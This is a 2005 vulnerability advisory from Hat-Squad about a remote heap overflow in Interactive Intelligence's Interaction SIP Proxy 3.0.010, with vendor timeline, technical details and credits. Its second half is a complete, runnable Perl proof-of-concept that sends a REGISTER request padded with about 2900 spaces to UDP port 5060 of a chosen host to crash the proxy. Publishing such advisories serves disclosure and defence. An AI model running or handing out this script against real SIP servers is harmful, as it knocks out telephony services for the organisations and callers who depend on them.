Hat-Squad Advisory: Remote Heap Corruption Vulnerability in Interaction SIP Proxy Product: Interaction SIP Proxy Vendor: Interactive Intelligence Inc. (http://www.inin.com) Systems Affected: Vonexus Enterprise Interaction Center Interaction SipProxy 3.0.010 Release Date: 12/21/2005 Vendor Status: Informed on 12/11/2005 Initial response on 12/12/2005 Patch released on 12/18/2005 Overview: Interaction SIP Proxy is Microsoft Windows-based software that provides basic SIP proxy and registrar functionality as defined in the IETF SIP-oriented RFC 3261. The Interaction SIP Proxy routes incoming SIP messages based on configurable dial plan and server plans, with simplified administration via Web interface. Problem: Hat-Squad security team has discovered a remote heap overflow in Interaction SIP Proxy. The vulnerability allows a remote attacker to overwrite heap memory and cause a a severe denial-of-service condition on system. Exploitation of this vulnerability for code execution requires a magic sequence of pre-allocations, data and size. Technical Details: The code in i3sipmsg.dll is responsible for handling SIP requests. The vulnerability is triggered by sending 2900 bytes of space (0x20) or TAB (0x9) characters as SIP version in a REGISTER request line. This will cause a heap overflow in SIPParser function. A Proof of concept for this vulnerability is available at http://www.hat-squad.com/i3sip.html Credits: This Vulnerability has been Discovered By Behrang Fouladi (behrang hat-squad com) Greetings: Persia, Hamid, Hesam geek, Nima, Brett Moore, class101 and Babak #! /usr/bin/perl ## #i3 SIP Proxy POC - http://www.hat-squad.com/en/000171.html #This vulnerability allows a remote user to overwrite heap memory of i3sipproxy. #The request size varies, but size=2900 bytes works in most of the cases. Successful #exploitation of this bug for code executuion requires a magic combination of #pre-allocations, data and size. # use strict; use IO::Socket::INET; my $host = shift(@ARGV); my $size = shift(@ARGV); my $port=5060; print "\n\n Interactive SIP proxy heap corruption POC \n\n"; print " By Behrang Fouladi, Hat-Squad Security Team \n\n"; print(" Usage: perl $0 \n\n"),exit if(!$host || !$size); my $iaddr=inet_aton($host) || die ("Unable to resolve $host"); socket(DoS,PF_INET,SOCK_DGRAM,17); my $sip= "REGISTER sip:test\@test.com SIP/"; $sip.= "\x20"x$size; $sip.= "\r\n"; $sip.= "Via: SIP/2.0/TCP 192.168.0.1:7043"; $sip.= "\r\n"; $sip.= "Max-Forwards: 70\r\n"; $sip.= "From: ;tag=ec8c2399e9\r\n"; $sip.= "To: \r\n"; $sip.= "Call-ID: 1b6c7397b109453c93d85edc88d9810e\r\n"; $sip.= "CSeq: 1 REGISTER\r\n"; $sip.= "Contact: ;methods=\"INVITE, MESSAGE, INFO, SUBSCRIBE, OPTIONS, BYE, CANCEL, NOTIFY, ACK, REFER, BENOTIFY\";proxy=replace\r\n"; $sip.= "Content-Length: 0\r\n"; $sip.= "\r\n"; send(DoS,$sip,0,sockaddr_in($port,$iaddr)); print " Exploit Sent to $host...\n"; print " The SIP Proxy should crash now.\n\n"; exit(0);